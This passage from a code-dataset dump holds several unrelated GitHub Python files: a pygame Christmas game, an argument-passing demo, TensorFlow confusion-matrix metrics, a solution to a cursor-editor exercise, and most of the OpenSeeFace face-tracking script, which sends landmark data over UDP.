math\nimport random\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\npygame.init()\n\n# Set the width and height of the screen [width, height]\nsize = (700, 500)\ndisplay = pygame.display.set_mode(size)\n\nfont = pygame.font.SysFont(\"Verdana\",25)\n\npygame.display.set_caption(\"My Game\")\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n\n#Loading images\nsanta_img = pygame.image.load('santa.png').convert()\nsanta_main_img = pygame.transform.scale(santa_img,(64,64))\nsanta_main_img.set_colorkey((BLACK))\n\ngifts = []\ngift_speed = 2\n\ngift_1 = pygame.image.load('gift_1.png').convert()\ngift_1 = pygame.transform.scale(gift_1,(32,32))\ngift_1.set_colorkey((BLACK))\ngifts.append(gift_1)\n\ngift_2 = pygame.image.load('gift_2.png').convert()\ngift_2 = pygame.transform.scale(gift_2,(32,32))\ngift_2.set_colorkey((BLACK))\ngifts.append(gift_2)\n\ngift_3 = pygame.image.load('gift_3.png').convert()\ngift_3 = pygame.transform.scale(gift_3,(32,32))\ngift_3.set_colorkey((BLACK))\ngifts.append(gift_3)\n\nbackground = pygame.image.load('background.png').convert()\n#End of loading images\n\n#Classes\n\nclass Santa(pygame.sprite.Sprite):\n def __init__(self, x, y, size):\n super().__init__()\n self.size = size\n self.image = pygame.Surface([self.size,self.size])\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.speed = 5\n\n self.score = 0\n\n self.change_x = 0\n self.change_y = 0\n\n def changespeed(self, x):\n\n self.change_x += x\n\n\n def update(self,display):\n\n display.blit(santa_main_img,(self.rect.x,self.rect.y))\n\n self.rect.x += self.change_x\n\n img = font.render('Score: '+ str(self.score), True, GREEN)\n display.blit(img,(0,0))\n\n\n\n\nclass Gift(pygame.sprite.Sprite):\n def __init__(self, x, y, size):\n super().__init__()\n self.size = size\n self.image = pygame.Surface([self.size,self.size])\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.speed = gift_speed\n\n self.type = random.randint(0,2)\n\n def update(self,display):\n \n display.blit(gifts[self.type],(self.rect.x,self.rect.y))\n self.rect.y += self.speed\n\n if self.rect.y > 440:\n all_sprites_group.remove(self)\n\n\n\nclass Snow(pygame.sprite.Sprite):\n def __init__(self, width,height):\n super().__init__()\n self.size = size\n self.image = pygame.Surface([width,height]) \n self.image.fill(WHITE) \n self.rect = self.image.get_rect()\n\n self.rect.x = random.randrange(0, 700) \n self.rect.y = random.randrange(-50, 50) \n\n self.speed = 1\n\n def update(self,display):\n \n self.rect.y += self.speed\n\n if self.rect.y > 440:\n all_sprites_group.remove(self)\n snow_group.remove(self)\n self.kill()\n\n\nall_sprites_group = pygame.sprite.Group() \nsanta_group = pygame.sprite.Group() \ngift_group = pygame.sprite.Group() \nsnow_group = pygame.sprite.Group() \n\n\nmysanta = Santa(300,400,64)\nall_sprites_group.add(mysanta)\nsanta_group.add(mysanta)\n\n\nindex = 0\ndiff = 0\n\n\n# -------- Main Program Loop -----------\nwhile not done:\n # --- Main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n # Set the speed based on the key pressed\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n mysanta.changespeed(-3)\n elif event.key == pygame.K_RIGHT:\n mysanta.changespeed(3)\n \n # Reset speed when key goes up\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n mysanta.changespeed(3)\n elif event.key == pygame.K_RIGHT:\n mysanta.changespeed(-3)\n\n\n diff += 1\n index += 1\n if index > 75:\n mygift = Gift(random.randint(0,700),0,32)\n all_sprites_group.add(mygift)\n gift_group.add(mygift)\n index = 0\n \n #gifts fall faster after some time\n if diff > 1000:\n gift_speed += 1\n diff = 0\n\n display.blit(background,(0,0))\n\n santa_gift_list = pygame.sprite.groupcollide(santa_group , gift_group, False, True)\n for gift in santa_gift_list:\n mysanta.score += 1\n\n\n size = random.randint(2,4)\n my_snow = Snow(size, size) \n snow_group.add (my_snow) \n all_sprites_group.add (my_snow) \n \n\n # --- Drawing code should go here\n\n all_sprites_group.update(display)\n snow_group.draw(display)\n\n pygame.display.flip()\n \n \n clock.tick(60)\n pygame.display.update()\n\n\npygame.quit()\n","repo_name":"Lazar-Djukovic/Lazar-Djukovic_Classwork_Prep","sub_path":"Christmas2022/Christmas2022.py","file_name":"Christmas2022.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8749264132","text":"def dislplayArguments(argument1, *argument2, **argument3):\n print(argument1) \n for arg in argument2: \n print(arg) \n for arg in argument3.items(): \n print(arg) \n \narg1 = \"Welcome\"\narg3 = \"Golang\"\ndislplayArguments(arg1, \"to\", arg3, agr4 = 4,arg5 =\"Golang !\") \n ","repo_name":"sagarsmn331/Tutree-task","sub_path":"p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1750973744","text":"from tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import confusion_matrix\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import state_ops\nfrom tensorflow.python.ops import variable_scope\nimport numpy as np\n\ndef metric_variable(shape, dtype, validate_shape=True, name=None):\n \"\"\"Create variable in `GraphKeys.(LOCAL|METRIC_VARIABLES)` collections.\n If running in a `DistributionStrategy` context, the variable will be\n \"tower local\". This means:\n * The returned object will be a container with separate variables\n per replica/tower of the model.\n * When writing to the variable, e.g. using `assign_add` in a metric\n update, the update will be applied to the variable local to the\n replica/tower.\n * To get a metric's result value, we need to sum the variable values\n across the replicas/towers before computing the final answer.\n Furthermore, the final answer should be computed once instead of\n in every replica/tower. Both of these are accomplished by\n running the computation of the final result value inside\n `tf.contrib.distribution_strategy_context.get_tower_context(\n ).merge_call(fn)`.\n Inside the `merge_call()`, ops are only added to the graph once\n and access to a tower-local variable in a computation returns\n the sum across all replicas/towers.\n Args:\n shape: Shape of the created variable.\n dtype: Type of the created variable.\n validate_shape: (Optional) Whether shape validation is enabled for\n the created variable.\n name: (Optional) String name of the created variable.\n Returns:\n A (non-trainable) variable initialized to zero, or if inside a\n `DistributionStrategy` scope a tower-local variable container.\n \"\"\"\n # Note that synchronization \"ON_READ\" implies trainable=False.\n return variable_scope.variable(\n lambda: array_ops.zeros(shape, dtype),\n collections=[\n ops.GraphKeys.LOCAL_VARIABLES, ops.GraphKeys.METRIC_VARIABLES\n ],\n validate_shape=validate_shape,\n synchronization=variable_scope.VariableSynchronization.ON_READ,\n aggregation=variable_scope.VariableAggregation.SUM,\n name=name)\n\ndef streaming_confusion_matrix(labels, predictions, num_classes, weights=None):\n \"\"\"Calculate a streaming confusion matrix.\n Calculates a confusion matrix. For estimation over a stream of data,\n the function creates an `update_op` operation.\n Args:\n labels: A `Tensor` of ground truth labels with shape [batch size] and of\n type `int32` or `int64`. The tensor will be flattened if its rank > 1.\n predictions: A `Tensor` of prediction results for semantic labels, whose\n shape is [batch size] and type `int32` or `int64`. The tensor will be\n flattened if its rank > 1.\n num_classes: The possible number of labels the prediction task can\n have. This value must be provided, since a confusion matrix of\n dimension = [num_classes, num_classes] will be allocated.\n weights: Optional `Tensor` whose rank is either 0, or the same rank as\n `labels`, and must be broadcastable to `labels` (i.e., all dimensions must\n be either `1`, or the same as the corresponding `labels` dimension).\n Returns:\n total_cm: A `Tensor` representing the confusion matrix.\n update_op: An operation that increments the confusion matrix.\n \"\"\"\n # Local variable to accumulate the predictions in the confusion matrix.\n total_cm = metric_variable(\n [num_classes, num_classes], dtypes.float64, name='total_confusion_matrix')\n\n # Cast the type to int64 required by confusion_matrix_ops.\n predictions = math_ops.to_int64(predictions)\n labels = math_ops.to_int64(labels)\n num_classes = math_ops.to_int64(num_classes)\n\n # Flatten the input if its rank > 1.\n if predictions.get_shape().ndims > 1:\n predictions = array_ops.reshape(predictions, [-1])\n\n if labels.get_shape().ndims > 1:\n labels = array_ops.reshape(labels, [-1])\n\n if (weights is not None) and (weights.get_shape().ndims > 1):\n weights = array_ops.reshape(weights, [-1])\n\n # Accumulate the prediction to current confusion matrix.\n current_cm = confusion_matrix.confusion_matrix(\n labels, predictions, num_classes, weights=weights, dtype=dtypes.float64)\n update_op = state_ops.assign_add(total_cm, current_cm)\n return (total_cm, update_op)\n\n\ndef calculate(total_cm, num_class):\n precisions = []\n recalls = []\n fs = []\n for i in range(num_class):\n rowsum, colsum = np.sum(total_cm[i]), np.sum(total_cm[r][i] for r in range(num_class))\n precision = total_cm[i][i] / float(colsum+1e-12)\n recall = total_cm[i][i] / float(rowsum+1e-12)\n f = 2 * precision * recall / (precision + recall+1e-12)\n precisions.append(precision)\n recalls.append(recall)\n fs.append(f)\n return np.mean(precisions), np.mean(recalls), np.mean(fs)\n","repo_name":"kyzhouhzau/BERT-NER","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","stars":1212,"dataset":"github-code","pt":"60"} +{"seq_id":"4837194517","text":"# 에디터\n# 초기에 편집기에 입력되어 있는 문자열이 주어지고, 그 이후 입력한 명령어가 차례로 주어졌을 때,\n# 모든 명령어를 수행하고 난 후 편집기에 입력되어 있는 문자열을 구하는 프로그램을 작성하시오.\n# 단, 명령어가 수행되기 전에 커서는 문장의 맨 뒤에 위치하고 있다고 한다.\n'''\nL\t커서를 왼쪽으로 한 칸 옮김 (커서가 문장의 맨 앞이면 무시됨)\nD\t커서를 오른쪽으로 한 칸 옮김 (커서가 문장의 맨 뒤이면 무시됨)\nB\t커서 왼쪽에 있는 문자를 삭제함 (커서가 문장의 맨 앞이면 무시됨)\n삭제로 인해 커서는 한 칸 왼쪽으로 이동한 것처럼 나타나지만, 실제로 커서의 오른쪽에 있던 문자는 그대로임\nP $\t$라는 문자를 커서 왼쪽에 추가함\n'''\n\nleft_str = list(input()) # 초기에 편집기에 입력되어 있는 문자열\nright_str = [] # 커서의 오른쪽에 위치하는 문자열\nN = int(input()) # 입력할 명령어의 개수\n\nfor _ in range(N):\n cmd = input().split()\n\n if cmd[0] == 'L':\n if len(left_str) == 0:\n continue\n c = left_str.pop()\n right_str.append(c)\n elif cmd[0] == 'D':\n if len(right_str) == 0:\n continue\n c = right_str.pop()\n left_str.append(c)\n elif cmd[0] == 'B':\n if len(left_str) == 0:\n continue\n left_str.pop()\n elif cmd[0] == 'P':\n left_str.append(cmd[1])\n\nwhile left_str:\n c = left_str.pop()\n right_str.append(c)\n\noutput = ''\n\nwhile right_str:\n output += right_str.pop()\n\nprint(output)\n\n# 시간초과.....\n","repo_name":"lets-code-together/lets-code-together","sub_path":"AlgorithmsBasic/2-DataStructure1/1406_3.py","file_name":"1406_3.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39705066070","text":"import copy\nimport os\nimport sys\nimport argparse\nimport traceback\nimport gc\n\nparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument(\"-i\", \"--ip\", help=\"Set IP address for sending tracking data\", default=\"127.0.0.1\")\nparser.add_argument(\"-p\", \"--port\", type=int, help=\"Set port for sending tracking data\", default=11573)\nif os.name == 'nt':\n parser.add_argument(\"-l\", \"--list-cameras\", type=int, help=\"Set this to 1 to list the available cameras and quit, set this to 2 or higher to output only the names\", default=0)\n parser.add_argument(\"-a\", \"--list-dcaps\", type=int, help=\"Set this to -1 to list all cameras and their available capabilities, set this to a camera id to list that camera's capabilities\", default=None)\n parser.add_argument(\"-W\", \"--width\", type=int, help=\"Set camera and raw RGB width\", default=640)\n parser.add_argument(\"-H\", \"--height\", type=int, help=\"Set camera and raw RGB height\", default=360)\n parser.add_argument(\"-D\", \"--dcap\", type=int, help=\"Set which device capability line to use or -1 to use the default camera settings (FPS still need to be set separately)\", default=None)\n parser.add_argument(\"-B\", \"--blackmagic\", type=int, help=\"When set to 1, special support for Blackmagic devices is enabled\", default=0)\nelse:\n parser.add_argument(\"-W\", \"--width\", type=int, help=\"Set raw RGB width\", default=640)\n parser.add_argument(\"-H\", \"--height\", type=int, help=\"Set raw RGB height\", default=360)\nparser.add_argument(\"-F\", \"--fps\", type=int, help=\"Set camera frames per second\", default=24)\nparser.add_argument(\"-c\", \"--capture\", help=\"Set camera ID (0, 1...) or video file\", default=\"0\")\nparser.add_argument(\"-M\", \"--mirror-input\", action=\"store_true\", help=\"Process a mirror image of the input video\")\nparser.add_argument(\"-m\", \"--max-threads\", type=int, help=\"Set the maximum number of threads\", default=1)\nparser.add_argument(\"-t\", \"--threshold\", type=float, help=\"Set minimum confidence threshold for face tracking\", default=None)\nparser.add_argument(\"-d\", \"--detection-threshold\", type=float, help=\"Set minimum confidence threshold for face detection\", default=0.6)\nparser.add_argument(\"-v\", \"--visualize\", type=int, help=\"Set this to 1 to visualize the tracking, to 2 to also show face ids, to 3 to add confidence values or to 4 to add numbers to the point display\", default=0)\nparser.add_argument(\"-P\", \"--pnp-points\", type=int, help=\"Set this to 1 to add the 3D fitting points to the visualization\", default=0)\nparser.add_argument(\"-s\", \"--silent\", type=int, help=\"Set this to 1 to prevent text output on the console\", default=0)\nparser.add_argument(\"--faces\", type=int, help=\"Set the maximum number of faces (slow)\", default=1)\nparser.add_argument(\"--scan-retinaface\", type=int, help=\"When set to 1, scanning for additional faces will be performed using RetinaFace in a background thread, otherwise a simpler, faster face detection mechanism is used. When the maximum number of faces is 1, this option does nothing.\", default=0)\nparser.add_argument(\"--scan-every\", type=int, help=\"Set after how many frames a scan for new faces should run\", default=3)\nparser.add_argument(\"--discard-after\", type=int, help=\"Set the how long the tracker should keep looking for lost faces\", default=10)\nparser.add_argument(\"--max-feature-updates\", type=int, help=\"This is the number of seconds after which feature min/max/medium values will no longer be updated once a face has been detected.\", default=900)\nparser.add_argument(\"--no-3d-adapt\", type=int, help=\"When set to 1, the 3D face model will not be adapted to increase the fit\", default=1)\nparser.add_argument(\"--try-hard\", type=int, help=\"When set to 1, the tracker will try harder to find a face\", default=0)\nparser.add_argument(\"--video-out\", help=\"Set this to the filename of an AVI file to save the tracking visualization as a video\", default=None)\nparser.add_argument(\"--video-scale\", type=int, help=\"This is a resolution scale factor applied to the saved AVI file\", default=1, choices=[1,2,3,4])\nparser.add_argument(\"--video-fps\", type=float, help=\"This sets the frame rate of the output AVI file\", default=24)\nparser.add_argument(\"--raw-rgb\", type=int, help=\"When this is set, raw RGB frames of the size given with \\\"-W\\\" and \\\"-H\\\" are read from standard input instead of reading a video\", default=0)\nparser.add_argument(\"--log-data\", help=\"You can set a filename to which tracking data will be logged here\", default=\"\")\nparser.add_argument(\"--log-output\", help=\"You can set a filename to console output will be logged here\", default=\"\")\nparser.add_argument(\"--model\", type=int, help=\"This can be used to select the tracking model. Higher numbers are models with better tracking quality, but slower speed, except for model 4, which is wink optimized. Models 1 and 0 tend to be too rigid for expression and blink detection. Model -2 is roughly equivalent to model 1, but faster. Model -3 is between models 0 and -1.\", default=3, choices=[-3, -2, -1, 0, 1, 2, 3, 4])\nparser.add_argument(\"--model-dir\", help=\"This can be used to specify the path to the directory containing the .onnx model files\", default=None)\nparser.add_argument(\"--gaze-tracking\", type=int, help=\"When set to 1, gaze tracking is enabled, which makes things slightly slower\", default=1)\nparser.add_argument(\"--face-id-offset\", type=int, help=\"When set, this offset is added to all face ids, which can be useful for mixing tracking data from multiple network sources\", default=0)\nparser.add_argument(\"--repeat-video\", type=int, help=\"When set to 1 and a video file was specified with -c, the tracker will loop the video until interrupted\", default=0)\nparser.add_argument(\"--dump-points\", type=str, help=\"When set to a filename, the current face 3D points are made symmetric and dumped to the given file when quitting the visualization with the \\\"q\\\" key\", default=\"\")\nparser.add_argument(\"--benchmark\", type=int, help=\"When set to 1, the different tracking models are benchmarked, starting with the best and ending with the fastest and with gaze tracking disabled for models with negative IDs\", default=0)\nif os.name == 'nt':\n parser.add_argument(\"--use-dshowcapture\", type=int, help=\"When set to 1, libdshowcapture will be used for video input instead of OpenCV\", default=1)\n parser.add_argument(\"--blackmagic-options\", type=str, help=\"When set, this additional option string is passed to the blackmagic capture library\", default=None)\n parser.add_argument(\"--priority\", type=int, help=\"When set, the process priority will be changed\", default=None, choices=[0, 1, 2, 3, 4, 5])\nargs = parser.parse_args()\n\nos.environ[\"OMP_NUM_THREADS\"] = str(args.max_threads)\n\nclass OutputLog(object):\n def __init__(self, fh, output):\n self.fh = fh\n self.output = output\n def write(self, buf):\n if self.fh is not None:\n self.fh.write(buf)\n self.output.write(buf)\n self.flush()\n def flush(self):\n if self.fh is not None:\n self.fh.flush()\n self.output.flush()\noutput_logfile = None\nif args.log_output != \"\":\n output_logfile = open(args.log_output, \"w\")\nsys.stdout = OutputLog(output_logfile, sys.stdout)\nsys.stderr = OutputLog(output_logfile, sys.stderr)\n\nif os.name == 'nt':\n import dshowcapture\n if args.blackmagic == 1:\n dshowcapture.set_bm_enabled(True)\n if args.blackmagic_options is not None:\n dshowcapture.set_options(args.blackmagic_options)\n if args.priority is not None:\n import psutil\n classes = [psutil.IDLE_PRIORITY_CLASS, psutil.BELOW_NORMAL_PRIORITY_CLASS, psutil.NORMAL_PRIORITY_CLASS, psutil.ABOVE_NORMAL_PRIORITY_CLASS, psutil.HIGH_PRIORITY_CLASS, psutil.REALTIME_PRIORITY_CLASS]\n p = psutil.Process(os.getpid())\n p.nice(classes[args.priority])\n\nif os.name == 'nt' and (args.list_cameras > 0 or args.list_dcaps is not None):\n cap = dshowcapture.DShowCapture()\n info = cap.get_info()\n unit = 10000000.;\n if args.list_dcaps is not None:\n formats = {0: \"Any\", 1: \"Unknown\", 100: \"ARGB\", 101: \"XRGB\", 200: \"I420\", 201: \"NV12\", 202: \"YV12\", 203: \"Y800\", 300: \"YVYU\", 301: \"YUY2\", 302: \"UYVY\", 303: \"HDYC (Unsupported)\", 400: \"MJPEG\", 401: \"H264\" }\n for cam in info:\n if args.list_dcaps == -1:\n type = \"\"\n if cam['type'] == \"Blackmagic\":\n type = \"Blackmagic: \"\n print(f\"{cam['index']}: {type}{cam['name']}\")\n if args.list_dcaps != -1 and args.list_dcaps != cam['index']:\n continue\n for caps in cam['caps']:\n format = caps['format']\n if caps['format'] in formats:\n format = formats[caps['format']]\n if caps['minCX'] == caps['maxCX'] and caps['minCY'] == caps['maxCY']:\n print(f\" {caps['id']}: Resolution: {caps['minCX']}x{caps['minCY']} FPS: {unit/caps['maxInterval']:.3f}-{unit/caps['minInterval']:.3f} Format: {format}\")\n else:\n print(f\" {caps['id']}: Resolution: {caps['minCX']}x{caps['minCY']}-{caps['maxCX']}x{caps['maxCY']} FPS: {unit/caps['maxInterval']:.3f}-{unit/caps['minInterval']:.3f} Format: {format}\")\n else:\n if args.list_cameras == 1:\n print(\"Available cameras:\")\n for cam in info:\n type = \"\"\n if cam['type'] == \"Blackmagic\":\n type = \"Blackmagic: \"\n if args.list_cameras == 1:\n print(f\"{cam['index']}: {type}{cam['name']}\")\n else:\n print(f\"{type}{cam['name']}\")\n cap.destroy_capture()\n sys.exit(0)\n\nimport numpy as np\nimport time\nimport cv2\nimport socket\nimport struct\nimport json\nfrom input_reader import InputReader, VideoReader, DShowCaptureReader, try_int\nfrom tracker import Tracker, get_model_base_path\n\nif args.benchmark > 0:\n model_base_path = get_model_base_path(args.model_dir)\n im = cv2.imread(os.path.join(model_base_path, \"benchmark.bin\"), cv2.IMREAD_COLOR)\n results = []\n for model_type in [3, 2, 1, 0, -1, -2, -3]:\n tracker = Tracker(224, 224, threshold=0.1, max_threads=args.max_threads, max_faces=1, discard_after=0, scan_every=0, silent=True, model_type=model_type, model_dir=args.model_dir, no_gaze=(model_type == -1), detection_threshold=0.1, use_retinaface=0, max_feature_updates=900, static_model=True if args.no_3d_adapt == 1 else False)\n tracker.detected = 1\n tracker.faces = [(0, 0, 224, 224)]\n total = 0.0\n for i in range(100):\n start = time.perf_counter()\n r = tracker.predict(im)\n total += time.perf_counter() - start\n print(1. / (total / 100.))\n sys.exit(0)\n\ntarget_ip = args.ip\ntarget_port = args.port\n\nif args.faces >= 40:\n print(\"Transmission of tracking data over network is not supported with 40 or more faces.\")\n\nfps = args.fps\ndcap = None\nuse_dshowcapture_flag = False\nif os.name == 'nt':\n dcap = args.dcap\n use_dshowcapture_flag = True if args.use_dshowcapture == 1 else False\n input_reader = InputReader(args.capture, args.raw_rgb, args.width, args.height, fps, use_dshowcapture=use_dshowcapture_flag, dcap=dcap)\n if args.dcap == -1 and type(input_reader) == DShowCaptureReader:\n fps = min(fps, input_reader.device.get_fps())\nelse:\n input_reader = InputReader(args.capture, args.raw_rgb, args.width, args.height, fps)\nif type(input_reader.reader) == VideoReader:\n fps = 0\n\nlog = None\nout = None\nfirst = True\nheight = 0\nwidth = 0\ntracker = None\nsock = None\ntotal_tracking_time = 0.0\ntracking_time = 0.0\ntracking_frames = 0\nframe_count = 0\n\nfeatures = [\"eye_l\", \"eye_r\", \"eyebrow_steepness_l\", \"eyebrow_updown_l\", \"eyebrow_quirk_l\", \"eyebrow_steepness_r\", \"eyebrow_updown_r\", \"eyebrow_quirk_r\", \"mouth_corner_updown_l\", \"mouth_corner_inout_l\", \"mouth_corner_updown_r\", \"mouth_corner_inout_r\", \"mouth_open\", \"mouth_wide\"]\n\nif args.log_data != \"\":\n log = open(args.log_data, \"w\")\n log.write(\"Frame,Time,Width,Height,FPS,Face,FaceID,RightOpen,LeftOpen,AverageConfidence,Success3D,PnPError,RotationQuat.X,RotationQuat.Y,RotationQuat.Z,RotationQuat.W,Euler.X,Euler.Y,Euler.Z,RVec.X,RVec.Y,RVec.Z,TVec.X,TVec.Y,TVec.Z\")\n for i in range(66):\n log.write(f\",Landmark[{i}].X,Landmark[{i}].Y,Landmark[{i}].Confidence\")\n for i in range(66):\n log.write(f\",Point3D[{i}].X,Point3D[{i}].Y,Point3D[{i}].Z\")\n for feature in features:\n log.write(f\",{feature}\")\n log.write(\"\\r\\n\")\n log.flush()\n\nis_camera = args.capture == str(try_int(args.capture))\n\ntry:\n attempt = 0\n frame_time = time.perf_counter()\n target_duration = 0\n if fps > 0:\n target_duration = 1. / float(fps)\n repeat = args.repeat_video != 0 and type(input_reader.reader) == VideoReader\n need_reinit = 0\n failures = 0\n source_name = input_reader.name\n while repeat or input_reader.is_open():\n if not input_reader.is_open() or need_reinit == 1:\n input_reader = InputReader(args.capture, args.raw_rgb, args.width, args.height, fps, use_dshowcapture=use_dshowcapture_flag, dcap=dcap)\n if input_reader.name != source_name:\n print(f\"Failed to reinitialize camera and got {input_reader.name} instead of {source_name}.\")\n sys.exit(1)\n need_reinit = 2\n time.sleep(0.02)\n continue\n if not input_reader.is_ready():\n time.sleep(0.02)\n continue\n\n ret, frame = input_reader.read()\n if ret and args.mirror_input:\n frame = cv2.flip(frame, 1)\n if not ret:\n if repeat:\n if need_reinit == 0:\n need_reinit = 1\n continue\n elif is_camera:\n attempt += 1\n if attempt > 30:\n break\n else:\n time.sleep(0.02)\n if attempt == 3:\n need_reinit = 1\n continue\n else:\n break;\n\n attempt = 0\n need_reinit = 0\n frame_count += 1\n now = time.time()\n\n if first:\n first = False\n height, width, channels = frame.shape\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n tracker = Tracker(width, height, threshold=args.threshold, max_threads=args.max_threads, max_faces=args.faces, discard_after=args.discard_after, scan_every=args.scan_every, silent=False if args.silent == 0 else True, model_type=args.model, model_dir=args.model_dir, no_gaze=False if args.gaze_tracking != 0 and args.model != -1 else True, detection_threshold=args.detection_threshold, use_retinaface=args.scan_retinaface, max_feature_updates=args.max_feature_updates, static_model=True if args.no_3d_adapt == 1 else False, try_hard=args.try_hard == 1)\n if args.video_out is not None:\n out = cv2.VideoWriter(args.video_out, cv2.VideoWriter_fourcc('F','F','V','1'), args.video_fps, (width * args.video_scale, height * args.video_scale))\n\n try:\n inference_start = time.perf_counter()\n faces = tracker.predict(frame)\n if len(faces) > 0:\n inference_time = (time.perf_counter() - inference_start)\n total_tracking_time += inference_time\n tracking_time += inference_time / len(faces)\n tracking_frames += 1\n packet = bytearray()\n detected = False\n for face_num, f in enumerate(faces):\n f = copy.copy(f)\n f.id += args.face_id_offset\n if f.eye_blink is None:\n f.eye_blink = [1, 1]\n right_state = \"O\" if f.eye_blink[0] > 0.30 else \"-\"\n left_state = \"O\" if f.eye_blink[1] > 0.30 else \"-\"\n if args.silent == 0:\n print(f\"Confidence[{f.id}]: {f.conf:.4f} / 3D fitting error: {f.pnp_error:.4f} / Eyes: {left_state}, {right_state}\")\n detected = True\n if not f.success:\n pts_3d = np.zeros((70, 3), np.float32)\n packet.extend(bytearray(struct.pack(\"d\", now)))\n packet.extend(bytearray(struct.pack(\"i\", f.id)))\n packet.extend(bytearray(struct.pack(\"f\", width)))\n packet.extend(bytearray(struct.pack(\"f\", height)))\n packet.extend(bytearray(struct.pack(\"f\", f.eye_blink[0])))\n packet.extend(bytearray(struct.pack(\"f\", f.eye_blink[1])))\n packet.extend(bytearray(struct.pack(\"B\", 1 if f.success else 0)))\n packet.extend(bytearray(struct.pack(\"f\", f.pnp_error)))\n packet.extend(bytearray(struct.pack(\"f\", f.quaternion[0])))\n packet.extend(bytearray(struct.pack(\"f\", f.quaternion[1])))\n packet.extend(bytearray(struct.pack(\"f\", f.quaternion[2])))\n packet.extend(bytearray(struct.pack(\"f\", f.quaternion[3])))\n packet.extend(bytearray(struct.pack(\"f\", f.euler[0])))\n packet.extend(bytearray(struct.pack(\"f\", f.euler[1])))\n packet.extend(bytearray(struct.pack(\"f\", f.euler[2])))\n packet.extend(bytearray(struct.pack(\"f\", f.translation[0])))\n packet.extend(bytearray(struct.pack(\"f\", f.translation[1])))\n packet.extend(bytearray(struct.pack(\"f\", f.translation[2])))\n if log is not None:\n log.write(f\"{frame_count},{now},{width},{height},{fps},{face_num},{f.id},{f.eye_blink[0]},{f.eye_blink[1]},{f.conf},{f.success},{f.pnp_error},{f.quaternion[0]},{f.quaternion[1]},{f.quaternion[2]},{f.quaternion[3]},{f.euler[0]},{f.euler[1]},{f.euler[2]},{f.rotation[0]},{f.rotation[1]},{f.rotation[2]},{f.translation[0]},{f.translation[1]},{f.translation[2]}\")\n for (x,y,c) in f.lms:\n packet.extend(bytearray(struct.pack(\"f\", c)))\n if args.visualize > 1:\n frame = cv2.putText(frame, str(f.id), (int(f.bbox[0]), int(f.bbox[1])), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (255,0,255))\n if args.visualize > 2:\n frame = cv2.putText(frame, f\"{f.conf:.4f}\", (int(f.bbox[0] + 18), int(f.bbox[1] - 6)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255))\n for pt_num, (x,y,c) in enumerate(f.lms):\n packet.extend(bytearray(struct.pack(\"f\", y)))\n packet.extend(bytearray(struct.pack(\"f\", x)))\n if log is not None:\n log.write(f\",{y},{x},{c}\")\n if pt_num == 66 and (f.eye_blink[0] < 0.30 or c < 0.20):\n continue\n if pt_num == 67 and (f.eye_blink[1] < 0.30 or c < 0.20):\n continue\n x = int(x + 0.5)\n y = int(y + 0.5)\n if args.visualize != 0 or out is not None:\n if args.visualize > 3:\n frame = cv2.putText(frame, str(pt_num), (int(y), int(x)), cv2.FONT_HERSHEY_SIMPLEX, 0.25, (255,255,0))\n color = (0, 255, 0)\n if pt_num >= 66:\n color = (255, 255, 0)\n if not (x < 0 or y < 0 or x >= height or y >= width):\n cv2.circle(frame, (y, x), 1, color, -1)\n if args.pnp_points != 0 and (args.visualize != 0 or out is not None) and f.rotation is not None:\n if args.pnp_points > 1:\n projected = cv2.projectPoints(f.face_3d[0:66], f.rotation, f.translation, tracker.camera, tracker.dist_coeffs)\n else:\n projected = cv2.projectPoints(f.contour, f.rotation, f.translation, tracker.camera, tracker.dist_coeffs)\n for [(x,y)] in projected[0]:\n x = int(x + 0.5)\n y = int(y + 0.5)\n if not (x < 0 or y < 0 or x >= height or y >= width):\n frame[int(x), int(y)] = (0, 255, 255)\n x += 1\n if not (x < 0 or y < 0 or x >= height or y >= width):\n frame[int(x), int(y)] = (0, 255, 255)\n y += 1\n if not (x < 0 or y < 0 or x >= height or y >= width):\n frame[int(x), int(y)] = (0, 255, 255)\n x -= 1\n if not (x < 0 or y < 0 or x >= height or y >= width):\n frame[int(x), int(y)] = (0, 255, 255)\n for (x,y,z) in f.pts_3d:\n packet.extend(bytearray(struct.pack(\"f\", x)))\n packet.extend(bytearray(struct.pack(\"f\", -y)))\n packet.extend(bytearray(struct.pack(\"f\", -z)))\n if log is not None:\n log.write(f\",{x},{-y},{-z}\")\n if f.current_features is None:\n f.current_features = {}\n for feature in features:\n if not feature in f.current_features:\n f.current_features[feature] = 0\n packet.extend(bytearray(struct.pack(\"f\", f.current_features[feature])))\n if log is not None:\n log.write(f\",{f.current_features[feature]}\")\n if log is not None:\n log.write(\"\\r\\n\")\n log.flush()\n\n if detected and len(faces) < 40:\n sock.sendto(packet, (target_ip, target_port))\n\n if out is not None:\n video_frame = frame\n if args.video_scale != 1:\n video_frame = cv2.resize(frame, (width * args.video_scale, height * args.video_scale), interpolation=cv2.INTER_NEAREST)\n out.write(video_frame)\n if args.video_scale != 1:\n del video_frame\n\n if args.visualize != 0:\n cv2.imshow('OpenSeeFace Visualization', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n if args.dump_points != \"\" and faces is 